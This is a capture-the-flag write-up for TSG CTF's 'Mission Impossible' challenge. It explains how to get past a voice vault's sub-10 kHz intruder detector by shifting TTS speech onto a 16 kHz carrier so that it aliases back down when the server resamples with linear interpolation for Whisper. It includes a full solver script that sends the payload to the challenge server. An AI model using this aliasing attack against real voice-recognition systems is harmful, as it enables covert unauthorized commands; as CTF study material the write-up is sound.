Challenge Details

Category: Misc / Signal Processing / Audio

Description:
The security system of CIA vault room is state-of-the-art.
There are a large number of pressure-sensitive, temperature-sensitive and audio-sensitive sensors.
And the terminal is operated by voice recognition.

Files Provided:

❯ tree .
.
├── Dockerfile
└── src
    └── server.py

Goal: Bypass a frequency-based security system to issue a voice command to a neural network.

Solution

1. Challenge Overview

We are presented with a "state-of-the-art" voice-controlled vault. The system listens for audio commands but has strict security measures:

Intruder Detector: It analyzes the audio spectrum. If it detects any energy below 10,000 Hz, the band that carries essentially all intelligible speech, it triggers an alarm.
Voice Recognition: If the alarm isn't triggered, the audio is passed to OpenAI's Whisper model to check for the passphrase: "Give me the flag".

The Paradox: We need to send a voice command, whose fundamental pitch sits at roughly 85–255 Hz and whose intelligible content extends to a few kHz, without putting any sound energy below 10,000 Hz.

2. Analyzing the Source Code (`server.py`)

There are two critical functions in the server code that reveal the vulnerability.

The Guard: `detect_intruder`

def detect_intruder(freq_space, sr):
    # Zeroes out everything ABOVE 10,000 Hz
    cut_high_freqs(freq_space, sr, 10000) 

    # Checks if anything remains BELOW 10,000 Hz
    magnitude = np.abs(freq_space).max()
    return magnitude > 0

This function acts as a low-pass filter followed by a presence check: it zeroes every frequency above 10 kHz, then raises the alarm if anything is left in the remaining low band. If our audio carries no energy in the 0–10 kHz range, we pass this check.
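
To make the check concrete, here is a minimal sketch that measures the largest spectral magnitude below the cutoff. The helper name `low_band_peak` is hypothetical, and since the server's `cut_high_freqs` is not shown in this writeup, the sketch only approximates the idea with `np.fft.rfft`; it is not the server's code.

```python
import numpy as np

def low_band_peak(wave, sr, cutoff=10_000):
    """Largest FFT magnitude among bins strictly below `cutoff` Hz (hypothetical helper)."""
    spectrum = np.fft.rfft(wave)
    freqs = np.fft.rfftfreq(len(wave), d=1.0 / sr)
    return np.abs(spectrum[freqs < cutoff]).max()

sr = 48_000
t = np.arange(sr) / sr                        # one second of samples
audible = np.sin(2 * np.pi * 1_000 * t)       # 1 kHz tone: inside the guarded band
ultrasonic = np.sin(2 * np.pi * 15_000 * t)   # 15 kHz tone: outside the guarded band

peak_audible = low_band_peak(audible, sr)
peak_ultrasonic = low_band_peak(ultrasonic, sr)
print(peak_audible, peak_ultrasonic)
```

The 1 kHz tone produces a large peak in the guarded band, while the 15 kHz tone leaves only floating-point residue there. That gap is what the rest of the attack relies on.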

The Listener: `recognize`

# ... Intruder check passed ...

# Resample to 16,000 Hz for Whisper
wave = librosa.resample(wave, orig_sr=sr, target_sr=WHISPER_SR, res_type="linear")
result = whisper.transcribe(model, wave)["text"]

This is the flaw. The server uses `librosa.resample` with `res_type="linear"`. Linear interpolation is fast, but it lacks a proper anti-aliasing filter.

If you feed a resampler a signal containing frequencies above the Nyquist frequency of the target rate (half the new sample rate) and it does not filter them out first, those high frequencies "fold back" (alias) and appear as low frequencies.
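
The fold-back can be reproduced offline with a small sketch. Here `np.interp` stands in for the server's `librosa.resample(..., res_type="linear")` call; this is an assumption made to keep the example dependency-free, and the helpers `linear_resample` and `dominant_frequency` are hypothetical names.

```python
import numpy as np

def linear_resample(wave, orig_sr, target_sr):
    """Resample by plain linear interpolation, with no anti-aliasing filter."""
    n_out = int(len(wave) / orig_sr * target_sr)
    t_in = np.arange(len(wave)) / orig_sr
    t_out = np.arange(n_out) / target_sr
    return np.interp(t_out, t_in, wave)

def dominant_frequency(wave, sr):
    """Frequency (Hz) of the strongest FFT bin."""
    spectrum = np.abs(np.fft.rfft(wave))
    freqs = np.fft.rfftfreq(len(wave), d=1.0 / sr)
    return freqs[np.argmax(spectrum)]

orig_sr, target_sr = 48_000, 16_000
t = np.arange(orig_sr) / orig_sr
tone = np.cos(2 * np.pi * 15_000 * t)   # 15 kHz: above the 8 kHz Nyquist of the target rate

resampled = linear_resample(tone, orig_sr, target_sr)
before = dominant_frequency(tone, orig_sr)          # strongest bin at 48 kHz
after = dominant_frequency(resampled, target_sr)    # strongest bin at 16 kHz
print(before, after)
```

With these parameters the tone that sat at 15 kHz before resampling shows up at 1 kHz afterwards, because nothing removed it before the rate was reduced.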

3. The Vulnerability: Spectral Aliasing

Aliasing is a phenomenon where different signals become indistinguishable when sampled.

The target sample rate is 16,000 Hz.
This means the "Nyquist Limit" is 8,000 Hz.
Any frequency f below 8,000 Hz passes through this system unchanged and still appears as f.
However, a frequency f near 16,000 Hz is sampled barely once per cycle, so the sampler "misses" most of each cycle and the samples trace out a low frequency instead.

The Math: If we sample a signal at F_s = 16000 Hz, a high-frequency input at F_in = 16000 - x Hz will look exactly like a low-frequency signal at x Hz.
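
A quick numerical check of this identity is sketched below. The helper `alias_frequency` is a hypothetical name; it applies the standard folding rule for real signals and is not taken from the challenge code.

```python
import numpy as np

def alias_frequency(f_in, fs):
    """Apparent frequency (Hz) of a real tone at f_in after unfiltered sampling at fs."""
    f = f_in % fs            # sampling cannot distinguish f from f + k*fs
    return min(f, fs - f)    # real signals fold around fs/2

fs = 16_000
n = np.arange(64)            # sample indices
matches = []
for x in (300, 1_000, 3_000):
    high = np.cos(2 * np.pi * (fs - x) * n / fs)   # tone at fs - x, sampled at fs
    low = np.cos(2 * np.pi * x * n / fs)           # tone at x, sampled at fs
    matches.append(np.allclose(high, low))
    print(x, alias_frequency(fs - x, fs), matches[-1])
```

The two sampled sequences agree sample for sample, since cos(2πn − θ) = cos(θ) for every integer n. The same rule maps 16000 + x Hz onto x Hz as well, which matters once both sidebands of a modulated signal are present.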

The Plan:

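Take the voice command ("Give me the flag"), whose useful content sits below ~3 kHz (a 1 kHz component serves as the running example).
Shift it up with amplitude modulation on a 16 kHz carrier, so the 1 kHz component lands at 15 kHz (with a mirror image at 17 kHz).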
The Guard (Intruder Detector): Sees 15 kHz. It ignores everything above 10 kHz. It sees silence. PASS.
The Listener (Whisper): Resamples the 15 kHz signal at 16 kHz. Due to aliasing, the 15 kHz signal folds back down to 1 kHz. Whisper hears the voice clearly.
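
The plan can be rehearsed on a single tone before touching real speech. In this sketch a 1 kHz cosine stands in for one component of the voice, and taking every third sample stands in for the server's linear resampling. That substitution is an assumption: for an exact 3:1 ratio the interpolation points should coincide with existing samples. `peak_frequencies` is a hypothetical helper.

```python
import numpy as np

def peak_frequencies(wave, rate, count):
    """Return the `count` strongest FFT bin frequencies, sorted ascending."""
    spectrum = np.abs(np.fft.rfft(wave))
    freqs = np.fft.rfftfreq(len(wave), d=1.0 / rate)
    strongest = np.argsort(spectrum)[-count:]
    return sorted(float(f) for f in freqs[strongest])

sr, carrier_hz, voice_hz = 48_000, 16_000, 1_000
t = np.arange(sr) / sr

voice = np.cos(2 * np.pi * voice_hz * t)                 # stand-in for one speech component
modulated = voice * np.cos(2 * np.pi * carrier_hz * t)   # amplitude modulation

sidebands = peak_frequencies(modulated, sr, 2)       # where the energy sits at 48 kHz
decimated = modulated[::3]                           # 48 kHz -> 16 kHz with no filtering
recovered = peak_frequencies(decimated, 16_000, 1)   # where it lands after the rate change
print(sidebands, recovered)
```

The modulated signal has its energy at 15 kHz and 17 kHz, both above the detector's 10 kHz cutoff, and after the unfiltered rate change both sidebands fold onto 1 kHz.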

4. The Final Script

import numpy as np
import librosa
import scipy.signal
from scipy.io import wavfile
from gtts import gTTS
from gradio_client import Client, handle_file

# Helper to remove high frequencies (clean input)
def butter_lowpass_filter(data, cutoff, fs, order=5):
    nyq = 0.5 * fs
    b, a = scipy.signal.butter(order, cutoff / nyq, btype='low', analog=False)
    return scipy.signal.filtfilt(b, a, data)

# Helper to remove low frequencies (clean output)
def butter_highpass_filter(data, cutoff, fs, order=5):
    nyq = 0.5 * fs
    b, a = scipy.signal.butter(order, cutoff / nyq, btype='high', analog=False)
    return scipy.signal.filtfilt(b, a, data)

def solve():
    # 1. Generate Voice Command
    print("[*] Generating TTS...")
    tts = gTTS("give me the flag")
    tts.save("base.mp3")

    # 2. Preparation
    # We use 48kHz to give us enough "room" to shift frequencies up
    target_sr = 48000
    y, sr = librosa.load("base.mp3", sr=target_sr)
    y = y[:int(4.5 * target_sr)] # Trim duration

    # 3. Clean the Source
    # Filter out anything above 3kHz in the voice so it doesn't leak later
    y_clean = butter_lowpass_filter(y, 3000, target_sr, order=6)

    # 4. Modulation (The Magic Trick)
    # Shift the 0-3kHz voice up to 13-19kHz range
    t = np.arange(len(y_clean)) / target_sr
    carrier = np.cos(2 * np.pi * 16000 * t)
    y_mod = y_clean * carrier

    # 5. Safety Firewall
    # Delete anything below 11kHz to ensure we bypass the intruder detector
    y_final = butter_highpass_filter(y_mod, 11000, target_sr, order=6)

    # 6. Anti-Click Fading
    # Smooth the start and end: an abrupt edge is a broadband "pop" that
    # would put energy below 10 kHz and trigger the alarm
    fade_len = int(0.1 * target_sr)
    fade_in = np.linspace(0, 1, fade_len)
    fade_out = np.linspace(1, 0, fade_len)
    y_final[:fade_len] *= fade_in
    y_final[-fade_len:] *= fade_out

    # 7. Save and Send
    y_int16 = (y_final / np.max(np.abs(y_final)) * 32767).astype(np.int16)
    wavfile.write("payload.wav", target_sr, y_int16)

    print("[*] Sending payload...")
    client = Client("http://35.194.98.181:57860/")
    result = client.predict(audio=handle_file("payload.wav"), api_name="/predict")
    print(result)

if __name__ == "__main__":
    solve()

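Output (the log below appears to come from a more verbose variant of the script, so its messages and file name differ from the listing above):

❯ python3 solver2.py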
[*] Generating base audio...
[*] Applying Low-pass filter (3kHz)...
[*] Modulating with 16kHz carrier...
[*] Applying High-pass filter (11kHz)...
[*] Payload saved to robust_solution.wav
[*] Sending payload to CIA Vault Terminal...
Loaded as API: http://35.194.98.181:57860/

[+] Server Response:
OK, here is the flag: TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}

Final Flag

TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}

Mission Impossible TSG CTF Writeup: Bypassing Audio Security with Spectral Aliasing
